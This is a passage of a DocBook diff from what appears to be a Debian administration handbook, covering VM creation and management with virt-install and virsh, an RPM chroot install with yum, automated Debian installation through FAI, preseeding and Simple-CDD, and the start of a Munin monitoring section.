+							The <literal>--connect</literal> option specifies the “hypervisor” to use. Its form is that of an URL containing a virtualization system (<literal>xen://</literal>, <literal>qemu://</literal>, <literal>lxc://</literal>, <literal>openvz://</literal>, <literal>vbox://</literal>, and so on) and the machine that should host the VM (this can be left empty in the case of the local host). In addition to that, and in the QEMU/KVM case, each user can manage virtual machines working with restricted permissions, and the URL path allows differentiating “system” machines (<literal>/system</literal>) from others (<literal>/session</literal>).
+						</para>
+
+					</callout>
+					 <callout arearefs="virtinst.type">
+						<para>
+							Since KVM is managed the same way as QEMU, the <literal>--virt-type kvm</literal> allows specifying the use of KVM even though the URL looks like QEMU.
+						</para>
+
+					</callout>
+					 <callout arearefs="virtinst.name">
+						<para>
+							The <literal>--name</literal> option defines a (unique) name for the virtual machine.
+						</para>
+
+					</callout>
+					 <callout arearefs="virtinst.ram">
+						<para>
+							The <literal>--ram</literal> option allows specifying the amount of RAM (in MB) to allocate for the virtual machine.
+						</para>
+
+					</callout>
+					 <callout arearefs="virtinst.disk">
+						<para>
+							The <literal>--disk</literal> specifies the location of the image file that is to represent our virtual machine's hard disk; that file is created, unless present, with a size (in GB) specified by the <literal>size</literal> parameter. The <literal>format</literal> parameter allows choosing among several ways of storing the image file. The default format (<literal>raw</literal>) is a single file exactly matching the disk's size and contents. We picked a more advanced format here, that is specific to QEMU and allows starting with a small file that only grows when the virtual machine starts actually using space.
+						</para>
+
+					</callout>
+					 <callout arearefs="virtinst.cdrom">
+						<para>
+							The <literal>--cdrom</literal> option is used to indicate where to find the optical disk to use for installation. The path can be either a local path for an ISO file, an URL where the file can be obtained, or the device file of a physical CD-ROM drive (i.e. <literal>/dev/cdrom</literal>).
+						</para>
+
+					</callout>
+					 <callout arearefs="virtinst.network">
+						<para>
+							The <literal>--network</literal> specifies how the virtual network card integrates in the host's network configuration. The default behavior (which we explicitly forced in our example) is to integrate it into any pre-existing network bridge. If no such bridge exists, the virtual machine will only reach the physical network through NAT, so it gets an address in a private subnet range (192.168.122.0/24).
+						</para>
+
+					</callout>
+					 <callout arearefs="virtinst.vnc">
+						<para>
+							<literal>--vnc</literal> states that the graphical console should be made available using VNC. The default behavior for the associated VNC server is to only listen on the local interface; if the VNC client is to be run on a different host, establishing the connection will require setting up an SSH tunnel (see <xref linkend="sect.ssh-port-forwarding" />). Alternatively, the <literal>--vnclisten=0.0.0.0</literal> can be used so that the VNC server is accessible from all interfaces; note that if you do that, you really should design your firewall accordingly.
+						</para>
+
+					</callout>
+					 <callout arearefs="virtinst.os">
+						<para>
+							The <literal>--os-type</literal> and <literal>--os-variant</literal> options allow optimizing a few parameters of the virtual machine, based on some of the known features of the operating system mentioned there.
+						</para>
+
+					</callout>
+
+				</calloutlist>
+				 <para>
+					At this point, the virtual machine is running, and we need to connect to the graphical console to proceed with the installation process. If the previous operation was run from a graphical desktop environment, this connection should be automatically started. If not, or if we operate remotely, <command>virt-viewer</command> can be run from any graphical environment to open the graphical console (note that the root password of the remote host is asked twice because the operation requires 2 SSH connections):
+				</para>
+				 
+<screen><computeroutput>$ </computeroutput><userinput>virt-viewer --connect qemu+ssh://root@<replaceable>server</replaceable>/system testkvm
+</userinput><computeroutput>root@server's password: 
+root@server's password: </computeroutput></screen>
+				 <para>
+					When the installation process ends, the virtual machine is restarted, now ready for use.
+				</para>
+
+			</section>
+			 <section>
+				<title>Managing Machines with <command>virsh</command></title>
+				 <indexterm>
+					<primary><command>virsh</command></primary>
+				</indexterm>
+				 <para>
+					Now that the installation is done, let us see how to handle the available virtual machines. The first thing to try is to ask <command>libvirtd</command> for the list of the virtual machines it manages:
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>virsh -c qemu:///system list --all
+ Id Name                 State
+----------------------------------
+  - testkvm              shut off
+</userinput></screen>
+				 <para>
+					Let's start our test virtual machine:
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>virsh -c qemu:///system start testkvm
+</userinput><computeroutput>Domain testkvm started</computeroutput></screen>
+				 <para>
+					We can now get the connection instructions for the graphical console (the returned VNC display can be given as parameter to <command>vncviewer</command>):
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>virsh -c qemu:///system vncdisplay testkvm
+</userinput><computeroutput>:0</computeroutput></screen>
+				 <para>
+					Other available <command>virsh</command> subcommands include:
+				</para>
+				 <itemizedlist>
+					<listitem>
+						<para>
+							<literal>reboot</literal> to restart a virtual machine;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							<literal>shutdown</literal> to trigger a clean shutdown;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							<literal>destroy</literal>, to stop it brutally;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							<literal>suspend</literal> to pause it;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							<literal>resume</literal> to unpause it;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							<literal>autostart</literal> to enable (or disable, with the <literal>--disable</literal> option) starting the virtual machine automatically when the host starts;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							<literal>undefine</literal> to remove all traces of the virtual machine from <command>libvirtd</command>.
+						</para>
+
+					</listitem>
+
+				</itemizedlist>
+				 <para>
+					All these subcommands take a virtual machine identifier as a parameter.
+				</para>
+
+			</section>
+			 <section>
+				<title>Installing an RPM based system in Debian with yum</title>
+				 <para>
+					If the virtual machine is meant to run a Debian (or one of its derivatives), the system can be initialized with <command>debootstrap</command>, as described above. But if the virtual machine is to be installed with an RPM-based system (such as Fedora, CentOS or Scientific Linux), the setup will need to be done using the <command>yum</command> utility (available in the package of the same name).
+				</para>
+				 <para>
+					The procedure requires using <command>rpm</command> to extract an initial set of files, including notably <command>yum</command> configuration files, and then calling <command>yum</command> to extract the remaining set of packages. But since we call <command>yum</command> from outside the chroot, we need to make some temporary changes. In the sample below, the target chroot is <filename>/srv/centos</filename>.
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>rootdir="/srv/centos"
+</userinput><computeroutput># </computeroutput><userinput>mkdir -p "$rootdir" /etc/rpm
+</userinput><computeroutput># </computeroutput><userinput>echo "%_dbpath /var/lib/rpm" &gt; /etc/rpm/macros.dbpath
+</userinput><computeroutput># </computeroutput><userinput>wget http://mirror.centos.org/centos/7/os/x86_64/Packages/centos-release-7-1.1503.el7.centos.2.8.x86_64.rpm
+</userinput><computeroutput># </computeroutput><userinput>rpm --nodeps --root "$rootdir" -i centos-release-7-1.1503.el7.centos.2.8.x86_64.rpm
+</userinput><computeroutput>rpm: RPM should not be used directly install RPM packages, use Alien instead!
+rpm: However assuming you know what you are doing...
+warning: centos-release-7-1.1503.el7.centos.2.8.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID f4a80eb5: NOKEY
+# </computeroutput><userinput>sed -i -e "s,gpgkey=file:///etc/,gpgkey=file://${rootdir}/etc/,g" $rootdir/etc/yum.repos.d/*.repo
+</userinput><computeroutput># </computeroutput><userinput>yum --assumeyes --installroot $rootdir groupinstall core
+</userinput><computeroutput>[...]
+# </computeroutput><userinput>sed -i -e "s,gpgkey=file://${rootdir}/etc/,gpgkey=file:///etc/,g" $rootdir/etc/yum.repos.d/*.repo
+</userinput></screen>
+
+			</section>
+
+		</section>
+
+	</section>
+	 <section id="sect.automated-installation">
+		<title>Automated Installation</title>
+		 <indexterm>
+			<primary>deployment</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>installation</primary>
+			<secondary>automated installation</secondary>
+		</indexterm>
+		 <para>
+			The Falcot Corp administrators, like many administrators of large IT services, need tools to install (or reinstall) quickly, and automatically if possible, their new machines.
+		</para>
+		 <para>
+			These requirements can be met by a wide range of solutions. On the one hand, generic tools such as SystemImager handle this by creating an image based on a template machine, then deploy that image to the target systems; at the other end of the spectrum, the standard Debian installer can be preseeded with a configuration file giving the answers to the questions asked during the installation process. As a sort of middle ground, a hybrid tool such as FAI (<emphasis>Fully Automatic Installer</emphasis>) installs machines using the packaging system, but it also uses its own infrastructure for tasks that are more specific to massive deployments (such as starting, partitioning, configuration and so on).
+		</para>
+		 <para>
+			Each of these solutions has its pros and cons: SystemImager works independently from any particular packaging system, which allows it to manage large sets of machines using several distinct Linux distributions. It also includes an update system that doesn't require a reinstallation, but this update system can only be reliable if the machines are not modified independently; in other words, the user must not update any software on their own, or install any other software. Similarly, security updates must not be automated, because they have to go through the centralized reference image maintained by SystemImager. This solution also requires the target machines to be homogeneous, otherwise many different images would have to be kept and managed (an i386 image won't fit on a powerpc machine, and so on).
+		</para>
+		 <para>
+			On the other hand, an automated installation using debian-installer can adapt to the specifics of each machine: the installer will fetch the appropriate kernel and software packages from the relevant repositories, detect available hardware, partition the whole hard disk to take advantage of all the available space, install the corresponding Debian system, and set up an appropriate bootloader. However, the standard installer will only install standard Debian versions, with the base system and a set of pre-selected “tasks”; this precludes installing a particular system with non-packaged applications. Fulfilling this particular need requires customizing the installer… Fortunately, the installer is very modular, and there are tools to automate most of the work required for this customization, most importantly simple-CDD (CDD being an acronym for <emphasis>Custom Debian Derivative</emphasis>). Even the simple-CDD solution, however, only handles initial installations; this is usually not a problem since the APT tools allow efficient deployment of updates later on.
+		</para>
+		 <para>
+			We will only give a rough overview of FAI, and skip SystemImager altogether (which is no longer in Debian), in order to focus more intently on debian-installer and simple-CDD, which are more interesting in a Debian-only context.
+		</para>
+		 <section id="sect.fai">
+			<title>Fully Automatic Installer (FAI)</title>
+			 <indexterm>
+				<primary>Fully Automatic Installer (FAI)</primary>
+			</indexterm>
+			 <para>
+				<foreignphrase>Fully Automatic Installer</foreignphrase> is probably the oldest automated deployment system for Debian, which explains its status as a reference; but its very flexible nature only just compensates for the complexity it involves.
+			</para>
+			 <para>
+				FAI requires a server system to store deployment information and allow target machines to boot from the network. This server requires the <emphasis role="pkg">fai-server</emphasis> package (or <emphasis role="pkg">fai-quickstart</emphasis>, which also brings the required elements for a standard configuration).
+			</para>
+			 <para>
+				FAI uses a specific approach for defining the various installable profiles. Instead of simply duplicating a reference installation, FAI is a full-fledged installer, fully configurable via a set of files and scripts stored on the server; the default location <filename>/srv/fai/config/</filename> is not automatically created, so the administrator needs to create it along with the relevant files. Most of the times, these files will be customized from the example files available in the documentation for the <emphasis role="pkg">fai-doc</emphasis> package, more particularly the <filename>/usr/share/doc/fai-doc/examples/simple/</filename> directory.
+			</para>
+			 <para>
+				Once the profiles are defined, the <command>fai-setup</command> command generates the elements required to start an FAI installation; this mostly means preparing or updating a minimal system (NFS-root) used during installation. An alternative is to generate a dedicated boot CD with <command>fai-cd</command>.
+			</para>
+			 <para>
+				Creating all these configuration files requires some understanding of the way FAI works. A typical installation process is made of the following steps:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						fetching a kernel from the network, and booting it;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						mounting the root filesystem from NFS;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						executing <command>/usr/sbin/fai</command>, which controls the rest of the process (the next steps are therefore initiated by this script);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						copying the configuration space from the server into <filename>/fai/</filename>;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						running <command>fai-class</command>. The <filename>/fai/class/[0-9][0-9]*</filename> scripts are executed in turn, and return names of “classes” that apply to the machine being installed; this information will serve as a base for the following steps. This allows for some flexibility in defining the services to be installed and configured.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						fetching a number of configuration variables, depending on the relevant classes;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						partitioning the disks and formatting the partitions, based on information provided in <filename>/fai/disk_config/<replaceable>class</replaceable></filename>;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						mounting said partitions;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						installing the base system;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						preseeding the Debconf database with <command>fai-debconf</command>;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						fetching the list of available packages for APT;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						installing the packages listed in <filename>/fai/package_config/<replaceable>class</replaceable></filename>;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						executing the post-configuration scripts, <filename>/fai/scripts/<replaceable>class</replaceable>/[0-9][0-9]*</filename>;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						recording the installation logs, unmounting the partitions, and rebooting.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+
+		</section>
+		 <section id="sect.d-i-preseeding">
+			<title>Preseeding Debian-Installer</title>
+			 <indexterm>
+				<primary>preseed</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>preconfiguration</primary>
+			</indexterm>
+			 <para>
+				At the end of the day, the best tool to install Debian systems should logically be the official Debian installer. This is why, right from its inception, debian-installer has been designed for automated use, taking advantage of the infrastructure provided by <emphasis role="pkg">debconf</emphasis>. The latter allows, on the one hand, to reduce the number of questions asked (hidden questions will use the provided default answer), and on the other hand, to provide the default answers separately, so that installation can be non-interactive. This last feature is known as <emphasis>preseeding</emphasis>.
+			</para>
+			 <sidebar> <title><emphasis>GOING FURTHER</emphasis> Debconf with a centralized database</title>
+			 <indexterm>
+				<primary><command>debconf</command></primary>
+			</indexterm>
+			 <para>
+				Preseeding allows to provide a set of answers to Debconf questions at installation time, but these answers are static and do not evolve as time passes. Since already-installed machines may need upgrading, and new answers may become required, the <filename>/etc/debconf.conf</filename> configuration file can be set up so that Debconf uses external data sources (such as an LDAP directory server, or a remote file accessed via NFS or Samba). Several external data sources can be defined at the same time, and they complement one another. The local database is still used (for read-write access), but the remote databases are usually restricted to reading. The <citerefentry><refentrytitle>debconf.conf</refentrytitle>
+				 <manvolnum>5</manvolnum></citerefentry> manual page describes all the possibilities in detail (you need the <emphasis role="pkg">debconf-doc</emphasis> package).
+			</para>
+			 </sidebar> <section>
+				<title>Using a Preseed File</title>
+				 <para>
+					There are several places where the installer can get a preseeding file:
+				</para>
+				 <itemizedlist>
+					<listitem>
+						<para>
+							in the initrd used to start the machine; in this case, preseeding happens at the very beginning of the installation, and all questions can be avoided. The file just needs to be called <filename>preseed.cfg</filename> and stored in the initrd root.
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							on the boot media (CD or USB key); preseeding then happens as soon as the media is mounted, which means right after the questions about language and keyboard layout. The <literal>preseed/file</literal> boot parameter can be used to indicate the location of the preseeding file (for instance, <filename>/cdrom/preseed.cfg</filename> when the installation is done off a CD-ROM, or <filename>/hd-media/preseed.cfg</filename> in the USB-key case).
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							from the network; preseeding then only happens after the network is (automatically) configured; the relevant boot parameter is then <literal>preseed/url=http://<replaceable>server</replaceable>/preseed.cfg</literal>.
+						</para>
+
+					</listitem>
+
+				</itemizedlist>
+				 <para>
+					At a glance, including the preseeding file in the initrd looks like the most interesting solution; however, it is rarely used in practice, because generating an installer initrd is rather complex. The other two solutions are much more common, especially since boot parameters provide another way to preseed the answers to the first questions of the installation process. The usual way to save the bother of typing these boot parameters by hand at each installation is to save them into the configuration for <command>isolinux</command> (in the CD-ROM case) or <command>syslinux</command> (USB key).
+				</para>
+
+			</section>
+			 <section>
+				<title>Creating a Preseed File</title>
+				 <para>
+					A preseed file is a plain text file, where each line contains the answer to one Debconf question. A line is split across four fields separated by whitespace (spaces or tabs), as in, for instance, <literal>d-i mirror/suite string stable</literal>:
+				</para>
+				 <itemizedlist>
+					<listitem>
+						<para>
+							the first field is the “owner” of the question; “d-i” is used for questions relevant to the installer, but it can also be a package name for questions coming from Debian packages;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							the second field is an identifier for the question;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							third, the type of question;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							the fourth and last field contains the value for the answer. Note that it must be separated from the third field with a single space; if there are more than one, the following space characters are considered part of the value.
+						</para>
+
+					</listitem>
+
+				</itemizedlist>
+				 <para>
+					The simplest way to write a preseed file is to install a system by hand. Then <command>debconf-get-selections --installer</command> will provide the answers concerning the installer. Answers about other packages can be obtained with <command>debconf-get-selections</command>. However, a cleaner solution is to write the preseed file by hand, starting from an example and the reference documentation: with such an approach, only questions where the default answer needs to be overridden can be preseeded; using the <literal>priority=critical</literal> boot parameter will instruct Debconf to only ask critical questions, and use the default answer for others.
+				</para>
+				 <sidebar> <title><emphasis>DOCUMENTATION</emphasis> Installation guide appendix</title>
+				 <para>
+					The installation guide, available online, includes detailed documentation on the use of a preseed file in an appendix. It also includes a detailed and commented sample file, which can serve as a base for local customizations. <ulink type="block" url="https://www.debian.org/releases/jessie/amd64/apb.html" /> <ulink type="block" url="https://www.debian.org/releases/jessie/example-preseed.txt" />
+				</para>
+				 </sidebar>
+			</section>
+			 <section>
+				<title>Creating a Customized Boot Media</title>
+				 <para>
+					Knowing where to store the preseed file is all very well, but the location isn't everything: one must, one way or another, alter the installation boot media to change the boot parameters and add the preseed file.
+				</para>
+				 <section>
+					<title>Booting From the Network</title>
+					 <para>
+						When a computer is booted from the network, the server sending the initialization elements also defines the boot parameters. Thus, the change needs to be made in the PXE configuration for the boot server; more specifically, in its <filename>/tftpboot/pxelinux.cfg/default</filename> configuration file. Setting up network boot is a prerequisite; see the Installation Guide for details. <ulink type="block" url="https://www.debian.org/releases/jessie/amd64/ch04s05.html" />
+					</para>
+
+				</section>
+				 <section>
+					<title>Preparing a Bootable USB Key</title>
+					 <para>
+						Once a bootable key has been prepared (see <xref linkend="sect.install-usb" />), a few extra operations are needed. Assuming the key contents are available under <filename>/media/usbdisk/</filename>:
+					</para>
+					 <itemizedlist>
+						<listitem>
+							<para>
+								copy the preseed file to <filename>/media/usbdisk/preseed.cfg</filename>
+							</para>
+
+						</listitem>
+						 <listitem>
+							<para>
+								edit <filename>/media/usbdisk/syslinux.cfg</filename> and add required boot parameters (see example below).
+							</para>
+
+						</listitem>
+
+					</itemizedlist>
+					 <example>
+						<title>syslinux.cfg file and preseeding parameters</title>
+						 
+<programlisting>default vmlinuz
+append preseed/file=/hd-media/preseed.cfg locale=en_US.UTF-8 keymap=us language=us country=US vga=788 initrd=initrd.gz  --
+</programlisting>
+
+					</example>
+
+				</section>
+				 <section>
+					<title>Creating a CD-ROM Image</title>
+					 <indexterm>
+						<primary>debian-cd</primary>
+					</indexterm>
+					 <para>
+						A USB key is a read-write media, so it was easy for us to add a file there and change a few parameters. In the CD-ROM case, the operation is more complex, since we need to regenerate a full ISO image. This task is handled by <emphasis role="pkg">debian-cd</emphasis>, but this tool is rather awkward to use: it needs a local mirror, and it requires an understanding of all the options provided by <filename>/usr/share/debian-cd/CONF.sh</filename>; even then, <command>make</command> must be invoked several times. <filename>/usr/share/debian-cd/README</filename> is therefore a very recommended read.
+					</para>
+					 <para>
+						Having said that, debian-cd always operates in a similar way: an “image” directory with the exact contents of the CD-ROM is generated, then converted to an ISO file with a tool such as <command>genisoimage</command>, <command>mkisofs</command> or <command>xorriso</command>. The image directory is finalized after debian-cd's <command>make image-trees</command> step. At that point, we insert the preseed file into the appropriate directory (usually <filename>$TDIR/$CODENAME/CD1/</filename>, $TDIR and $CODENAME being parameters defined by the <filename>CONF.sh</filename> configuration file). The CD-ROM uses <command>isolinux</command> as its bootloader, and its configuration file must be adapted from what debian-cd generated, in order to insert the required boot parameters (the specific file is <filename>$TDIR/$CODENAME/boot1/isolinux/isolinux.cfg</filename>). Then the “normal” process can be resumed, and we can go on to generating the ISO image with <command>make image CD=1</command> (or <command>make images</command> if several CD-ROMs are generated).
+					</para>
+
+				</section>
+
+			</section>
+
+		</section>
+		 <section id="sect.simple-cdd">
+			<title>Simple-CDD: The All-In-One Solution</title>
+			 <indexterm>
+				<primary>simple-cdd</primary>
+			</indexterm>
+			 <para>
+				Simply using a preseed file is not enough to fulfill all the requirements that may appear for large deployments. Even though it is possible to execute a few scripts at the end of the normal installation process, the selection of the set of packages to install is still not quite flexible (basically, only “tasks” can be selected); more important, this only allows installing official Debian packages, and precludes locally-generated ones.
+			</para>
+			 <para>
+				On the other hand, debian-cd is able to integrate external packages, and debian-installer can be extended by inserting new steps in the installation process. By combining these capabilities, it should be possible to create a customized installer that fulfills our needs; it should even be able to configure some services after unpacking the required packages. Fortunately, this is not a mere hypothesis, since this is exactly what Simple-CDD (in the <emphasis role="pkg">simple-cdd</emphasis> package) does.
+			</para>
+			 <para>
+				The purpose of Simple-CDD is to allow anyone to easily create a distribution derived from Debian, by selecting a subset of the available packages, preconfiguring them with Debconf, adding specific software, and executing custom scripts at the end of the installation process. This matches the “universal operating system” philosophy, since anyone can adapt it to their own needs.
+			</para>
+			 <section>
+				<title>Creating Profiles</title>
+				 <para>
+					Simple-CDD defines “profiles” that match the FAI “classes” concept, and a machine can have several profiles (determined at installation time). A profile is defined by a set of <filename>profiles/<replaceable>profile</replaceable>.*</filename> files:
+				</para>
+				 <itemizedlist>
+					<listitem>
+						<para>
+							the <filename>.description</filename> file contains a one-line description for the profile;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							the <filename>.packages</filename> file lists packages that will automatically be installed if the profile is selected;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							the <filename>.downloads</filename> file lists packages that will be stored onto the installation media, but not necessarily installed;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							the <filename>.preseed</filename> file contains preseeding information for Debconf questions (for the installer and/or for packages);
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							the <filename>.postinst</filename> file contains a script that will be run at the end of the installation process;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							lastly, the <filename>.conf</filename> file allows changing some Simple-CDD parameters based on the profiles to be included in an image.
+						</para>
+
+					</listitem>
+
+				</itemizedlist>
+				 <para>
+					The <literal>default</literal> profile has a particular role, since it is always selected; it contains the bare minimum required for Simple-CDD to work. The only thing that is usually customized in this profile is the <literal>simple-cdd/profiles</literal> preseed parameter: this allows avoiding the question, introduced by Simple-CDD, about what profiles to install.
+				</para>
+				 <para>
+					Note also that the commands will need to be invoked from the parent directory of the <filename>profiles</filename> directory.
+				</para>
+
+			</section>
+			 <section>
+				<title>Configuring and Using <command>build-simple-cdd</command></title>
+				 <indexterm>
+					<primary><command>build-simple-cdd</command></primary>
+				</indexterm>
+				 <sidebar> <title><emphasis>QUICK LOOK</emphasis> Detailed configuration file</title>
+				 <para>
+					An example of a Simple-CDD configuration file, with all possible parameters, is included in the package (<filename>/usr/share/doc/simple-cdd/examples/simple-cdd.conf.detailed.gz</filename>). This can be used as a starting point when creating a custom configuration file.
+				</para>
+				 </sidebar> <para>
+					Simple-CDD requires many parameters to operate fully. They will most often be gathered in a configuration file, which <command>build-simple-cdd</command> can be pointed at with the <literal>--conf</literal> option, but they can also be specified via dedicated parameters given to <command>build-simple-cdd</command>. Here is an overview of how this command behaves, and how its parameters are used:
+				</para>
+				 <itemizedlist>
+					<listitem>
+						<para>
+							the <literal>profiles</literal> parameter lists the profiles that will be included on the generated CD-ROM image;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							based on the list of required packages, Simple-CDD downloads the appropriate files from the server mentioned in <literal>server</literal>, and gathers them into a partial mirror (which will later be given to debian-cd);
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							the custom packages mentioned in <literal>local_packages</literal> are also integrated into this local mirror;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							debian-cd is then executed (within a default location that can be configured with the <literal>debian_cd_dir</literal> variable), with the list of packages to integrate;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							once debian-cd has prepared its directory, Simple-CDD applies some changes to this directory:
+						</para>
+						 <itemizedlist>
+							<listitem>
+								<para>
+									files containing the profiles are added in a <filename>simple-cdd</filename> subdirectory (that will end up on the CD-ROM);
+								</para>
+
+							</listitem>
+							 <listitem>
+								<para>
+									other files listed in the <literal>all_extras</literal> parameter are also added;
+								</para>
+
+							</listitem>
+							 <listitem>
+								<para>
+									the boot parameters are adjusted so as to enable the preseeding. Questions concerning language and country can be avoided if the required information is stored in the <literal>language</literal> and <literal>country</literal> variables.
+								</para>
+
+							</listitem>
+
+						</itemizedlist>
+
+					</listitem>
+					 <listitem>
+						<para>
+							debian-cd then generates the final ISO image.
+						</para>
+
+					</listitem>
+
+				</itemizedlist>
+
+			</section>
+			 <section>
+				<title>Generating an ISO Image</title>
+				 <para>
+					Once we have written a configuration file and defined our profiles, the remaining step is to invoke <command>build-simple-cdd --conf simple-cdd.conf</command>. After a few minutes, we get the required image in <filename>images/debian-8.0-amd64-CD-1.iso</filename>.
+				</para>
+
+			</section>
+
+		</section>
+
+	</section>
+	 <section id="sect.monitoring">
+		<title>Monitoring</title>
+		 <para>
+			Monitoring is a generic term, and the various involved activities have several goals: on the one hand, following usage of the resources provided by a machine allows anticipating saturation and the subsequent required upgrades; on the other hand, alerting the administrator as soon as a service is unavailable or not working properly means that the problems that do happen can be fixed sooner.
+		</para>
+		 <para>
+			<emphasis>Munin</emphasis> covers the first area, by displaying graphical charts for historical values of a number of parameters (used RAM, occupied disk space, processor load, network traffic, Apache/MySQL load, and so on). <emphasis>Nagios</emphasis> covers the second area, by regularly checking that the services are working and available, and sending alerts through the appropriate channels (e-mails, text messages, and so on). Both have a modular design, which makes it easy to create new plug-ins to monitor specific parameters or services.
+		</para>
+		 <sidebar> <title><emphasis>ALTERNATIVE</emphasis> Zabbix, an integrated monitoring tool</title>
+		 <indexterm>
+			<primary>Zabbix</primary>
+		</indexterm>
+		 <para>
+			Although Munin and Nagios are in very common use, they are not the only players in the monitoring field, and each of them only handles half of the task (graphing on one side, alerting on the other). Zabbix, on the other hand, integrates both parts of monitoring; it also has a web interface for configuring the most common aspects. It has grown by leaps and bounds during the last few years, and can now be considered a viable contender. On the monitoring server, you would install <emphasis role="pkg">zabbix-server-pgsql</emphasis> (or <emphasis role="pkg">zabbix-server-mysql</emphasis>), possibly together with <emphasis role="pkg">zabbix-frontend-php</emphasis> to have a web interface. On the hosts to monitor you would install <emphasis role="pkg">zabbix-agent</emphasis> feeding data back to the server. <ulink type="block" url="http://www.zabbix.com/" />
+		</para>
+		 </sidebar> <sidebar> <title><emphasis>ALTERNATIVE</emphasis> Icinga, a Nagios fork</title>
+		 <indexterm>
+			<primary>Icinga</primary>
+		</indexterm>
+		 <para>
+			Spurred by divergences in opinions concerning the development model for Nagios (which is controlled by a company), a number of developers forked Nagios and use Icinga as their new name. Icinga is still compatible — so far — with Nagios configurations and plugins, but it also adds extra features. <ulink type="block" url="http://www.icinga.org/" />
+		</para>
+		 </sidebar> <section id="sect.munin">
+			<title>Setting Up Munin</title>
+			 <indexterm>
+				<primary>Munin</primary>
+			</indexterm>
+			 <para>
+				The purpose of Munin is to monitor many machines; therefore, it quite naturally uses a client/server architecture. The central host — the grapher — collects data from all the monitored hosts, and generates historical graphs.
+			</para>
+			 <section>
+				<title>Configuring Hosts To Monitor</title>
+				 <para>
+					The first step is to install the <emphasis role="pkg">munin-node</emphasis> package. The daemon installed by this package listens on port 4949 and sends back the data collected by all the active plugins. Each plugin is a simple program returning a description of the collected data as well as the latest measured value. Plugins are stored in <filename>/usr/share/munin/plugins/</filename>, but only those with a symbolic link in <filename>/etc/munin/plugins/</filename> are really used.
+				</para>
+				 <para>
+					When the package is installed, a set of active plugins is determined based on the available software and the current configuration of the host. However, this autoconfiguration depends on a feature that each plugin must provide, and it is usually a good idea to review and tweak the results by hand. Browsing the <ulink url="http://gallery.munin-monitoring.org">Plugin Gallery</ulink> can be interesting even though not all plugins have comprehensive documentation. However, all plugins are scripts and most are rather simple and well-commented. Browsing <filename>/etc/munin/plugins/</filename> is therefore a good way of getting an idea of what each plugin is about and determining which should be removed. Similarly, enabling an interesting plugin found in <filename>/usr/share/munin/plugins/</filename> is a simple matter of setting up a symbolic link with <command>ln -sf /usr/share/munin/plugins/<replaceable>plugin</replaceable> /etc/munin/plugins/</command>. Note that when a plugin name ends with an underscore “_”, the plugin requires a parameter. This parameter must be stored in the name of the symbolic link; for instance, the “if_” plugin must be enabled with a <filename>if_eth0</filename> symbolic link, and it will monitor network traffic on the eth0 interface.
+				</para>
+				 <para>
+					Once all plugins are correctly set up, the daemon configuration must be updated to describe access control for the collected data. This involves <literal>allow</literal> directives in the <filename>/etc/munin/munin-node.conf</filename> file. The default configuration is <literal>allow ^127\.0\.0\.1$</literal>, and only allows access to the local host. An administrator will usually add a similar line containing the IP address of the grapher host, then restart the daemon with <command>service munin-node restart</command>.
+				</para>
+				 <sidebar> <title><emphasis>GOING FURTHER</emphasis> Creating local plugins</title>
+				 <para>
+					Munin does include detailed documentation on how plugins should behave, and how to develop new plugins. <ulink type="block" url="http://munin-monitoring.org/wiki/plugins" />
+				</para>
+				 <para>
+					A plugin is best tested when run in the same conditions as it would be when triggered by munin-node; this can be simulated by running <command>munin-run <replaceable>plugin</replaceable></command> as root. A potential second parameter given to this command (such as <literal>config</literal>) is passed to the plugin as a parameter.
+				</para>
+				 <para>
+					When a plugin is invoked with the <literal>config</literal> parameter, it must describe itself by returning a set of fields:
+				</para>
+				 
+<screen><computeroutput>$ </computeroutput><userinput>sudo munin-run load config
+</userinput><computeroutput>graph_title Load average
+graph_args --base 1000 -l 0
+graph_vlabel load
+graph_scale no
+graph_category system
+load.label load
+graph_info The load average of the machine describes how many processes are in the run-queue (scheduled to run "immediately").
+load.info 5 minute load average
+</computeroutput></screen>
+				 <para>
+					The various available fields are described by the “Plugin reference” available as part of the “Munin guide”. <ulink type="block" url="http://munin.readthedocs.org/en/latest/reference/plugin.html" />
+				</para>
+				 <para>
